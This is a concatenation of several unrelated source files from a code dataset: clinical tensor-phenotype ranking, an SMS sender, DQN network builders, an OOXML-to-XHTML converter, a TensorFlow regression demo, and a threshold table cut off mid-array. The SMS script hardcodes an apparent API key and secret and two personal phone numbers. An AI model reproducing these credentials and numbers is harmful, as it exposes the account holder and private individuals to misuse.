ktensor_phenotypes = pheno_htn_subset_analyzed_REG_withGamma[0]
l_pts = loaded_axisDict[0].keys()
l_jdrange = loaded_axisDict[1].keys()
l_meds= loaded_axisDict[2].keys()
#will store all the data
d_pheno_nonzero_labels = OrderedDict()
#sort phenotypes by lambda values:
d_lambda_phenoNumber = OrderedDict(zip( list(range(R)),
list(ktensor_phenotypes.lmbda)
))
l_phenoNumbers_sorted_by_lambda = [tup[0] for tup in sorted(d_lambda_phenoNumber.iteritems(), key=operator.itemgetter(1))][::-1] #get a sorted list of phenotype numbers, which are sorted by using the operator.itemgetter
#print phenotype feature names #################
#for i in range(10):
for i in l_phenoNumbers_sorted_by_lambda:
print "===== phenotype " + str(i) + "================================================================="
pheno_outstream.write("===== phenotype " + str(i) + "=================================================================" + '\n')
this_lmbda = ktensor_phenotypes.lmbda[i]
this_pheno_pt_factor = ktensor_phenotypes.U[0][:,i]
this_pheno_jdrange_factor = ktensor_phenotypes.U[1][:,i]
this_pheno_med_factor = ktensor_phenotypes.U[2][:,i]
this_pheno_pt_nnz = np.nonzero(this_pheno_pt_factor)[0]
this_pheno_jdrange_nnz = np.nonzero(this_pheno_jdrange_factor)[0]
this_pheno_med_nnz = np.nonzero(this_pheno_med_factor)[0]
l_nonzero_pt_thisPheno = []
l_nonzero_meds_thisPheno = []
l_nonzero_jdrange_thisPheno = []
l_nonzero_jdrange_names_thisPheno = []
for j in this_pheno_pt_nnz:
l_nonzero_pt_thisPheno.append(l_pts[j])
for j in this_pheno_jdrange_nnz:
l_nonzero_jdrange_thisPheno.append(l_jdrange[j])
l_nonzero_jdrange_names_thisPheno.append(d_jdrange_lookup[l_jdrange[j]])
for j in this_pheno_med_nnz:
l_nonzero_meds_thisPheno.append(l_meds[j])
#data
d_pheno_nonzero_labels[i] = dict() #for phenotype i
d_pheno_nonzero_labels[i]['LAMBDA'] = this_lmbda #lambda value
d_pheno_nonzero_labels[i]['PERCENT_PTS'] = len(l_nonzero_pt_thisPheno) / float(len(this_pheno_pt_factor))
d_pheno_nonzero_labels[i]['MEDS_NZ'] = l_nonzero_meds_thisPheno #for phenotype i
d_pheno_nonzero_labels[i]['JDRANGE_NZ'] = l_nonzero_jdrange_thisPheno #for phenotype i
d_pheno_nonzero_labels[i]['JDRANGE_NAMES_NZ'] = l_nonzero_jdrange_names_thisPheno #for phenotype i
print "proportion of pts: " + str(d_pheno_nonzero_labels[i]['PERCENT_PTS'])
pheno_outstream.write("proportion of pts: " + str(d_pheno_nonzero_labels[i]['PERCENT_PTS']) + '\n')
print "lambda: " + str(this_lmbda)
pheno_outstream.write("lambda: " + str(this_lmbda) + '\n')
print "----------------------------------------" #divider
pheno_outstream.write("----------------------------------------" + '\n')
#make ranking of JDRANGE by the weights:
nparr_jdrange_weights = this_pheno_jdrange_factor[this_pheno_jdrange_nnz]
d_jdrangeindex_weights = OrderedDict(zip(this_pheno_jdrange_nnz, nparr_jdrange_weights))
l_jdrangeindex_sorted = [tup[0] for tup in sorted(d_jdrangeindex_weights.iteritems(), key=operator.itemgetter(1))][::-1] #note: use slice [::-1] to reverse list!
for index_this_jdrange in l_jdrangeindex_sorted:
print d_jdrange_lookup[l_jdrange[index_this_jdrange]] + '\t' + str("%.3f" %this_pheno_jdrange_factor[index_this_jdrange] )
pheno_outstream.write(str(d_jdrange_lookup[l_jdrange[index_this_jdrange]]) + '\t' + str("%.3f" %this_pheno_jdrange_factor[index_this_jdrange]) +'\n')
print "----------------------------------------" #divider between diagnostic codes and meds
pheno_outstream.write("----------------------------------------" + '\n')
#make ranking of MED by the weights:
nparr_med_weights = this_pheno_med_factor[this_pheno_med_nnz]
d_medindex_weights = OrderedDict(zip(this_pheno_med_nnz, nparr_med_weights))
l_medindex_sorted = [tup[0] for tup in sorted(d_medindex_weights.iteritems(), key=operator.itemgetter(1))][::-1]
for index_this_med in l_medindex_sorted:
print l_meds[index_this_med] + '\t' + str("%.3f" %this_pheno_med_factor[index_this_med])
pheno_outstream.write(l_meds[index_this_med] + '\t' + str("%.3f" %this_pheno_med_factor[index_this_med]) + '\n')
pheno_outstream.close()
| [
"[email protected]"
] | |
6fbab4480a4dbe295810065fd70027aba431136e | 65fcf07ea6d6dfe0c5a4090343b098807e075010 | /app/send_sms.py | ddf1616e9f2939a4869869007f444ac64bf91988 | [] | no_license | parkhongbeen/study_selenium | 0e7e0bc23809c57c29d5352e2ee81b9a74060026 | f1bdfd3c3aa3299791cc53363eea0a811c6dcedc | refs/heads/master | 2021-04-20T11:27:39.522904 | 2020-03-26T12:54:59 | 2020-03-26T12:54:59 | 249,679,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | from sdk.api.message import Message
api_key = "NCSGLMHSQ2FTVZUA"
api_secret = "LCSOKSWPDNLZF971PMZ4XAQPZPYD60EW"
params = dict()
params['type'] = 'sms'
params['to'] = '01082128997'
params['from'] = '01050022354'
params['text'] = '야 홍빈아 내가 내일 커피사줄께'  # "Hey Hongbin, I'll buy you coffee tomorrow"
cool = Message(api_key, api_secret)
try:
response = cool.send(params)
except Exception as e:  # avoid a bare except; report what failed
    print('error:', e)
| [
"[email protected]"
] | |
7734622e41048306a547129450508bf4c50e9f13 | 094627e84a63cdeb97c8917cc6581cc55fa8f583 | /brl_baselines/deepq/models.py | 4309da5e793c8494de2fd8a12a042c7a978427f7 | [
"BSD-3-Clause"
] | permissive | gilwoolee/brl_baselines | 844f23b31f53648796325d13cb3c252cda0fc55d | c85df28c0f2dfbd69d3d27928bcbabf36a3663bb | refs/heads/master | 2022-11-28T22:31:31.195138 | 2020-08-04T02:17:28 | 2020-08-04T02:17:28 | 278,916,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,059 | py | import tensorflow as tf
import tensorflow.contrib.layers as layers
def _mlp(hiddens, input_, num_actions, scope, reuse=False, layer_norm=False):
with tf.variable_scope(scope, reuse=reuse):
out = input_
for hidden in hiddens:
out = layers.fully_connected(out, num_outputs=hidden, activation_fn=None)
if layer_norm:
out = layers.layer_norm(out, center=True, scale=True)
out = tf.nn.relu(out)
q_out = layers.fully_connected(out, num_outputs=num_actions, activation_fn=None)
return q_out
def mlp(hiddens=[], layer_norm=False):
"""This model takes as input an observation and returns values of all actions.
Parameters
----------
hiddens: [int]
list of sizes of hidden layers
layer_norm: bool
if true applies layer normalization for every layer
as described in https://arxiv.org/abs/1607.06450
Returns
-------
q_func: function
q_function for DQN algorithm.
"""
return lambda *args, **kwargs: _mlp(hiddens, layer_norm=layer_norm, *args, **kwargs)
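# Usage sketch (the hidden-layer sizes are assumed, not prescribed by this module):
#   q_func = mlp([64, 64], layer_norm=True)  # two 64-unit hidden layers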
def _cnn_to_mlp(convs, hiddens, dueling, input_, num_actions, scope, reuse=False, layer_norm=False):
with tf.variable_scope(scope, reuse=reuse):
out = input_
with tf.variable_scope("convnet"):
for num_outputs, kernel_size, stride in convs:
out = layers.convolution2d(out,
num_outputs=num_outputs,
kernel_size=kernel_size,
stride=stride,
activation_fn=tf.nn.relu)
conv_out = layers.flatten(out)
with tf.variable_scope("action_value"):
action_out = conv_out
for hidden in hiddens:
action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)
if layer_norm:
action_out = layers.layer_norm(action_out, center=True, scale=True)
action_out = tf.nn.relu(action_out)
action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)
if dueling:
with tf.variable_scope("state_value"):
state_out = conv_out
for hidden in hiddens:
state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)
if layer_norm:
state_out = layers.layer_norm(state_out, center=True, scale=True)
state_out = tf.nn.relu(state_out)
state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)
action_scores_mean = tf.reduce_mean(action_scores, 1)
action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)
q_out = state_score + action_scores_centered
else:
q_out = action_scores
return q_out
def cnn_to_mlp(convs, hiddens, dueling=False, layer_norm=False):
"""This model takes as input an observation and returns values of all actions.
Parameters
----------
convs: [(int, int, int)]
list of convolutional layers in form of
(num_outputs, kernel_size, stride)
hiddens: [int]
list of sizes of hidden layers
dueling: bool
if true double the output MLP to compute a baseline
for action scores
layer_norm: bool
if true applies layer normalization for every layer
as described in https://arxiv.org/abs/1607.06450
Returns
-------
q_func: function
q_function for DQN algorithm.
"""
return lambda *args, **kwargs: _cnn_to_mlp(convs, hiddens, dueling, layer_norm=layer_norm, *args, **kwargs)
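# Usage sketch - the conv/hidden sizes below are the common DQN Atari values,
# shown only as an example of the (num_outputs, kernel_size, stride) format:
#   q_func = cnn_to_mlp(convs=[(32, 8, 4), (64, 4, 2), (64, 3, 1)],
#                       hiddens=[256], dueling=True)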
def build_q_func(network, hiddens=[24], dueling=False, layer_norm=False, **network_kwargs):
if isinstance(network, str):
from baselines.common.models import get_network_builder
network = get_network_builder(network)(**network_kwargs)
def q_func_builder(input_placeholder, num_actions, scope, reuse=False):
with tf.variable_scope(scope, reuse=reuse):
print("Scope", scope, reuse, input_placeholder)
latent = network(input_placeholder)
if isinstance(latent, tuple):
if latent[1] is not None:
raise NotImplementedError("DQN is not compatible with recurrent policies yet")
latent = latent[0]
latent = layers.flatten(latent)
with tf.variable_scope("action_value"):
action_out = latent
# for hidden in hiddens:
# action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)
# if layer_norm:
# action_out = layers.layer_norm(action_out, center=True, scale=True)
# action_out = tf.nn.relu(action_out)
action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)
if dueling:
with tf.variable_scope("state_value"):
state_out = latent
# for hidden in hiddens:
# state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)
# if layer_norm:
# state_out = layers.layer_norm(state_out, center=True, scale=True)
# state_out = tf.nn.relu(state_out)
state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)
action_scores_mean = tf.reduce_mean(action_scores, 1)
action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)
q_out = state_score + action_scores_centered
else:
q_out = action_scores
return q_out
return q_func_builder
| [
"[email protected]"
] | |
3dcd85c38401d06af2e66326a9b522210cb53cf9 | 1f006f0c7871fcde10986c4f5cec916f545afc9f | /apps/ice/plugins/oxml/oxml2xhtml_basic_states.py | aa5a0c3fb0c927117618d8300e5a12d3ff58f720 | [] | no_license | ptsefton/integrated-content-environment | 248b8cd29b29e8989ec1a154dd373814742a38c1 | c1d6b5a1bea3df4dde10cb582fb0da361dd747bc | refs/heads/master | 2021-01-10T04:46:09.319989 | 2011-05-05T01:42:52 | 2011-05-05T01:42:52 | 36,273,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,587 | py | # Copyright (C) 2010 Distance and e-Learning Centre,
# University of Southern Queensland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
""" """
from oxml2xhtml_baseState import BaseState
class NullState(BaseState):
pass
class DocumentState(BaseState):
pass
class BodyState(BaseState):
pass
class ParaState(BaseState): # Heading, BlockQuote, DT, DD, Lists, etc...
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
self.__pLastChild = self.parentState._currentHtmlElement.getLastChild()
self._currentHtmlElement = self._currentHtmlElement.addChildElement("p")
self._numId = ""
self._nestedLevel = ""
def startElement(self, name, attrs):
if name=="w:bookmarkStart":
bookmarkId = attrs.get("w:id")
bookmarkName = attrs.get("w:name")
prefix = self._oxml.idPrefix + self._oxml.bookmarkPrefix
self._currentHtmlElement.addAttribute("id", prefix + bookmarkName)
elif name=="w:bookmarkEnd":
bookmarkId = attrs.get("w:id")
def endState(self):
style = self._style or ""
pce = self.parentState._currentHtmlElement
e = self._currentHtmlElement
if style.startswith("Heading"):
style = "h" + style[-1]
if style.startswith("h"):
e.name = style
elif style.startswith("bq"):
level = int(style[2])
e.name = "blockquote"
e.setAttribute("class", "bq level%s %s" % (level, style))
e = e.addChildElement("p")
elif style.startswith("dt") or style.startswith("dd"):
try:
level = int(style[2])
except:
level = 0
ename = style[:2]
if self.__pLastChild and self.__pLastChild.name=="dl":
dl = self.__pLastChild
else:
dl = pce.addChildElement("dl")
e.name = ename
e.setAttribute("class", "%s level%s" % (style, level-1))
#e = dl.addChildElement(ename, {"class": "%s level%s" % (style, level-1)})
dl.addChild(e)
elif style.startswith("li") or style=="ListParagraph":
listType = "ol" # default
attStyle = ""
if style=="ListParagraph": # Word lists
#self._numId
level = self._nestedLevel
ltype = style
info = self._oxml.numbering.getNumLevelInfo(self._numId, level)
format = info.get("format", "")
try:
leftIndent = info.get("leftIndent", "0")
leftIndent = int(int(leftIndent)/180)
attStyle += "padding-left:%sex;" % leftIndent
except:
pass
if format=="bullet":
listType = "ul"
classStyle = "ulb"
elif format=="decimal":
classStyle = "lin"
elif format=="lowerLetter":
classStyle = "lia"
elif format=="lowerRoman":
classStyle = "lii"
elif format=="upperLetter":
classStyle = "liA"
elif format=="upperRoman":
classStyle = "liI"
else:
classStyle = style
else:
level = int(style[2])
ltype = style[3]
classStyle = style[:2] + style[3]
if ltype=="b":
listType = "ul"
            # Find the pe (parent element) that we should be attaching to
def isListElement(e):
return e and (e.name=="ol" or e.name=="ul")
pListElems = []
pLastChild = self.__pLastChild # __pLastChild = parentState htmlElement lastChild
            while isListElement(pLastChild): # find the deepest listElement first
                pListElems.insert(0, pLastChild) # process deepest first
try:
#pLastChild = ul/li:last/ul:last
pLastChild = pLastChild.getLastChild().getLastChild()
except:
break
#print "pListElems='%s'" % len(pListElems)
listElem = None
for listE in pListElems:
if listE.tag==style + self._numId + self._nestedLevel:
listE.addChildElement("li").addChild(e)
listElem = listE
break
else:
if level>listE.tagLevel:
li = listE.getLastChild()
## add to listItem or add to listItem's p element
addTo = li # add to the listItems
# or add to the listItem's p element
# p = li.getLastChild()
# addTo = p
## NOTE: also the while loop above needs to be changed
## #pLastChild = ul/li:last/p:last/ul:last
## pLastChild = pLastChild.getLastChild().getLastChild().getLastChild()
##
newListElem = addTo.addChildElement(listType, {"class":classStyle})
newListElem.tag = style + self._numId + self._nestedLevel
newListElem.tagLevel = level
newListElem.addChildElement("li").addChild(e)
listElem = newListElem
break
if listElem is None:
# create a new top-level list element
newListElem = pce.addChildElement(listType, {"class":classStyle})
newListElem.tag = style + self._numId + self._nestedLevel
newListElem.tagLevel = level
newListElem.addChildElement("li").addChild(e)
elif style=="Title":
e.name = "h1"
e.setAttribute("class", "title")
if self.html.title=="":
self.html.title = e.text
elif style=="p-center":
e.setAttribute("class", "centered")
elif style=="p-right":
e.setAttribute("class", "right-aligned")
elif style=="p-indent":
e.setAttribute("class", "indented")
elif style.startswith("pre"):
level = 0
try:
level = int(style[3])
except:
pass
e.name = "pre"
e.setAttribute("class", "pre level%s" % level)
else:
pass
# return False if endState is canceled
return True
def __processList(self):
pass
class ParaPropState(BaseState):
# w:pPr
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def startElement(self, name, attrs):
if name=="w:pStyle":
self._style = attrs.get("w:val", "")
def endState(self):
p = self.parentState
p._style = self._style
# return False if endState is canceled
return True
class ParaNumPropState(BaseState):
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def startElement(self, name, attrs):
if name=="w:numId":
val = attrs.get("w:val", "")
p = self.parentState.parentState
p._numId = val
elif name=="w:ilvl":
val = attrs.get("w:val", "0")
p = self.parentState.parentState
p._nestedLevel = val
class RunState(BaseState): # inline
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
self._styles = []
def startElement(self, name, attrs):
if name=="w:br":
self._text += "\n"
elif name=="w:tab":
self._text += "\t"
def endState(self):
ce = self._currentHtmlElement
text = self._text
children = []
# HACK - treat code as pre-formatted ???
if "code" in self._styles:
t = self._html.createText(text)
t = str(t)
t = t.replace("\n", "<br/>").replace("\t", " "*4)
text = self._html.createRawText(t)
children.append(text)
elif text.find("\n")==-1: # no new lines found
children.append(text)
else:
lines = text.split("\n")
children.append(lines.pop(0))
for line in lines:
#ce.addChildElement("br")
children.append(self.html.createElement("br"))
children.append(line)
# HACK - megre sibling code elements into one ???
if len(self._styles)==1 and ce.getLastChild().name==self._styles[0]:
ce = ce.getLastChild()
else:
for style in self._styles:
ce = ce.addChildElement(style)
for child in children:
ce.addChild(child)
# return False if endState is canceled
return True
def addStyle(self, style):
self._styles.append(style)
class RunPropState(BaseState):
# w:rPr
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def startElement(self, name, attrs):
p = self.parentState
styleName = None
if name=="w:rStyle":
name = attrs.get("w:val", "")
if name=="i-code":
styleName = "code"
elif name=="i-sub":
styleName = "sub"
elif name=="i-sup":
styleName = "sup"
elif name=="w:b":
styleName = "b"
elif name=="w:i":
styleName = "i"
if styleName is not None:
p.addStyle(styleName)
def endState(self):
# return False if endState is canceled
return True
class TextState(BaseState):
# r:t
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def characters(self, text):
self.parentState._text += text
class HyperlinkState(BaseState):
# w:hyperlink
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
ce = self._currentHtmlElement
aName = attrs.get("w:anchor")
rId = attrs.get("r:id") #="rId5"
if aName:
prefix = self._oxml.idPrefix + self._oxml.bookmarkPrefix
href = "#" + prefix + aName
ce = ce.addChildElement("a", href=href)
else:
docRels = self._oxml.docRels
target, tMode = docRels.getTarget(rId), docRels.getTargetMode(rId)
ce = ce.addChildElement("a", href=target)
if tMode.lower()=="external":
ce.addAttribute("type", "external")
self._currentHtmlElement = ce
def endState(self):
# return False if endState is canceled
return True
class IgnoreState(BaseState):
pass
class UnknownState(BaseState):
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def startElement(self, name, attrs):
pass
def characters(self, text):
pass
def endState(self):
# return False if endState is canceled
return True
class SectPropState(BaseState):
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def endState(self):
# return False if endState is canceled
return True
| [
"[email protected]@110e3293-9ef9-cb8f-f479-66bdb1942d05"
] | [email protected]@110e3293-9ef9-cb8f-f479-66bdb1942d05 |
a28750d60b8ec5ca5296f66052472828b084a86a | 293763954ad29020d68d17bb20b2ac8ce09b2412 | /Learning & Documentation/Create Models in Tensorflow/linear_regression.py | de2ef0001bad013224eaa176c22b37be896378d2 | [
"MIT"
] | permissive | grebtsew/Object-and-facial-detection-in-python | b4371d86ca1b997c310c961b4eeb975af42a8f78 | 4ef987f1de7509876ca1e3588b2d6f4afaef2a75 | refs/heads/master | 2023-03-30T16:52:07.192025 | 2022-07-29T16:00:50 | 2022-07-29T16:00:50 | 122,378,661 | 17 | 5 | MIT | 2023-03-25T01:49:15 | 2018-02-21T18:52:07 | Python | UTF-8 | Python | false | false | 3,681 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear regression using the LinearRegressor Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import imports85 # pylint: disable=g-bad-import-order
STEPS = 1000
PRICE_NORM_FACTOR = 1000
def main(argv):
"""Builds, trains, and evaluates the model."""
#assert len(argv) == 1
  (train, test) = imports85.dataset()
# Switch the labels to units of thousands for better convergence.
def to_thousands(features, labels):
return features, labels / PRICE_NORM_FACTOR
print("train")
train = train.map(to_thousands)
print("test")
test = test.map(to_thousands)
# Build the training input_fn.
def input_train():
return (
# Shuffling with a buffer larger than the data set ensures
# that the examples are well mixed.
train.shuffle(1000).batch(128)
# Repeat forever
.repeat().make_one_shot_iterator().get_next())
# Build the validation input_fn.
def input_test():
return (test.shuffle(1000).batch(128)
.make_one_shot_iterator().get_next())
feature_columns = [
# "curb-weight" and "highway-mpg" are numeric columns.
tf.feature_column.numeric_column(key="curb-weight"),
tf.feature_column.numeric_column(key="highway-mpg"),
]
# Build the Estimator.
model = tf.estimator.LinearRegressor(feature_columns=feature_columns)
# Train the model.
# By default, the Estimators log output every 100 steps.
model.train(input_fn=input_train, steps=STEPS)
# Evaluate how the model performs on data it has not yet seen.
eval_result = model.evaluate(input_fn=input_test)
# The evaluation returns a Python dictionary. The "average_loss" key holds the
# Mean Squared Error (MSE).
average_loss = eval_result["average_loss"]
# Convert MSE to Root Mean Square Error (RMSE).
print("\n" + 80 * "*")
print("\nRMS error for the test set: ${:.0f}"
.format(PRICE_NORM_FACTOR * average_loss**0.5))
# Run the model in prediction mode.
input_dict = {
"curb-weight": np.array([2000, 3000]),
"highway-mpg": np.array([30, 40])
}
predict_input_fn = tf.estimator.inputs.numpy_input_fn(
input_dict, shuffle=False)
predict_results = model.predict(input_fn=predict_input_fn)
# Print the prediction results.
print("\nPrediction results:")
for i, prediction in enumerate(predict_results):
msg = ("Curb weight: {: 4d}lbs, "
"Highway: {: 0d}mpg, "
"Prediction: ${: 9.2f}")
msg = msg.format(input_dict["curb-weight"][i], input_dict["highway-mpg"][i],
PRICE_NORM_FACTOR * prediction["predictions"][0])
print(" " + msg)
print()
if __name__ == "__main__":
# The Estimator periodically generates "INFO" logs; make these logs visible.
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run(main=main)
| [
"[email protected]"
] | |
4e0dade735408ec02614201f3dce6b1d129075a7 | a518141ca3ba2b6fa63a7961b51936d9438ff022 | /10812 - Beat the Spread!.py | 5d9944100b2a7760d5decf4054a94f3decb2b9c7 | [] | no_license | jlhung/UVA-Python | ec93b2c98e04c753e8356f3e4825584fae4a8663 | 7a0db4fecffd7ac4f377f93da41291a8e998ee9b | refs/heads/master | 2022-11-28T04:47:49.270187 | 2020-08-10T13:19:58 | 2020-08-10T13:19:58 | 116,969,745 | 19 | 9 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | n = int(input())
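# Here x is the sum s+t of the two scores and y is the spread s-t, so
# s = (x+y)/2 and t = (x-y)/2; a solution exists only when x+y is even
# (x-y then has the same parity) and both scores come out non-negative,
# which is exactly what the checks below test.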
while n:
x, y = map(int, input().split())
if (x+y) % 2 or (x+y) < 0 or (x-y) < 0:
print("impossible")
else:
print(int((x+y) / 2), int((x-y) / 2))
n -= 1 | [
"[email protected]"
] | |
62085bac7af2c75ef4995d947ebe57ef7dcf9cb2 | 44a2741832c8ca67c8e42c17a82dbe23a283428d | /cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/ak6CaloJetSequence_pPb_mix_cff.py | 43faa9de8f5e464f8f33daa997f0ff65a0071833 | [] | no_license | yenjie/HIGenerator | 9ff00b3f98b245f375fbd1b565560fba50749344 | 28622c10395af795b2b5b1fecf42e9f6d4e26f2a | refs/heads/master | 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,457 | py |
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
ak6Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("ak6HiGenJetsCleaned")
)
ak6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("hiGenParticles")
)
ak6Calocorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("ak6CaloJets"),
payload = "AK6Calo_HI"
)
ak6CalopatJets = patJets.clone(jetSource = cms.InputTag("ak6CaloJets"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak6Calocorr")),
genJetMatch = cms.InputTag("ak6Calomatch"),
genPartonMatch = cms.InputTag("ak6Caloparton"),
jetIDMap = cms.InputTag("ak6CaloJetID"),
addBTagInfo = False,
addTagInfos = False,
addDiscriminators = False,
addAssociatedTracks = False,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = False
)
ak6CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("ak6CalopatJets"),
genjetTag = 'ak6HiGenJetsCleaned',
rParam = 0.6,
matchJets = cms.untracked.bool(True),
matchTag = 'akVs6CalopatJets',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("hiSignal")
)
ak6CaloJetSequence_mc = cms.Sequence(
ak6Calomatch
*
ak6Caloparton
*
ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_data = cms.Sequence(ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_jec = ak6CaloJetSequence_mc
ak6CaloJetSequence_mix = ak6CaloJetSequence_mc
ak6CaloJetSequence = cms.Sequence(ak6CaloJetSequence_mix)
| [
"[email protected]"
] | |
5a75b711fb29537898981bed0b06a74806f2c9fd | d6ed05e23faa20beb5e47624870608a9219ea81c | /TuningTools_old/scripts/analysis_scripts/dev/Trigger_20161214_20_7_7_3_LHbins/create_data.py | 085d2aa684d3438748ca6040bac02c4a8c3587d0 | [] | no_license | kaducovas/ringer | f6495088c0d54d622dcc707333b4c2fbf132d65f | 603311caab016ad0ef052ea4fcc605c5ac4e494b | refs/heads/master | 2020-06-16T21:37:15.228364 | 2019-07-08T01:29:57 | 2019-07-08T01:29:57 | 195,477,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,462 | py | #!/usr/bin/env python
import numpy as np
useLHBins = True
if useLHBins:
etaBins = [0.00,0.60,0.80,1.15,1.37,1.52,1.81,2.01,2.37,2.47]
etBins = [15,20,30,40,50000]
# Thresholds
thres_lh_etavect = [0,0.6,0.8,1.15,1.37,1.52,1.81,2.01,2.37,2.47]
thres_lh_etvect = [4,7,10,15,20,25,30,35,40,45,50]
tight20160701 = np.array( [[0.484,0.532,0.490,0.466,0.252,0.510,0.494,0.384,0.349], # 4 GeV
[0.531,0.599,0.557,0.532,0.381,0.575,0.569,0.454,0.403], # 7 GeV
[0.594,0.641,0.589,0.572,0.416,0.587,0.580,0.554,0.472], # 10 GeV
[0.700,0.692,0.680,0.675,0.589,0.687,0.690,0.624,0.671], # 15 GeV
[0.709,0.686,0.694,0.689,0.646,0.701,0.718,0.677,0.734], # 20 GeV
[0.752,0.749,0.736,0.730,0.561,0.747,0.744,0.708,0.745], # 25 GeV
[0.776,0.773,0.761,0.760,0.614,0.752,0.769,0.728,0.795], # 30 GeV
[0.794,0.791,0.786,0.783,0.629,0.780,0.785,0.766,0.792], # 35 GeV
[0.803,0.795,0.782,0.792,0.613,0.783,0.800,0.780,0.820], # 40 GeV
[0.808,0.795,0.793,0.812,0.647,0.798,0.814,0.799,0.853]] ) * 100. # 45 GeV
medium20160701 = np.array([[0.667,0.674,0.652,0.617,0.343,0.609,0.592,0.576,0.524], # 4 GeV
[0.670,0.737,0.715,0.679,0.527,0.701,0.683,0.587,0.537], # 7 GeV
[0.751,0.778,0.746,0.712,0.549,0.721,0.713,0.707,0.649], # 10 GeV
[0.815,0.804,0.782,0.781,0.677,0.794,0.764,0.742,0.757], # 15 GeV
[0.833,0.810,0.813,0.811,0.735,0.823,0.814,0.802,0.815], # 20 GeV
[0.863,0.860,0.848,0.848,0.656,0.842,0.834,0.827,0.817], # 25 GeV
[0.886,0.873,0.870,0.864,0.681,0.835,0.861,0.829,0.848], # 30 GeV
[0.897,0.894,0.886,0.875,0.714,0.876,0.867,0.842,0.866], # 35 GeV
[0.900,0.891,0.887,0.882,0.708,0.883,0.879,0.862,0.896], # 40 GeV
[0.894,0.895,0.893,0.886,0.719,0.882,0.888,0.869,0.913]] ) * 100. # 45 GeV
loose20160701 = np.array( [[0.813,0.810,0.807,0.781,0.536,0.758,0.739,0.750,0.709], # 4 GeV
[0.819,0.816,0.813,0.787,0.670,0.808,0.789,0.753,0.711], # 7 GeV
[0.853,0.850,0.827,0.801,0.692,0.837,0.818,0.816,0.777], # 10 GeV
[0.886,0.882,0.869,0.858,0.752,0.854,0.855,0.823,0.802], # 15 GeV
[0.897,0.888,0.885,0.884,0.791,0.880,0.871,0.853,0.875], # 20 GeV
[0.921,0.913,0.905,0.894,0.708,0.894,0.875,0.858,0.853], # 25 GeV
[0.934,0.930,0.922,0.912,0.735,0.908,0.909,0.866,0.869], # 30 GeV
[0.942,0.940,0.937,0.930,0.779,0.931,0.931,0.905,0.913], # 35 GeV
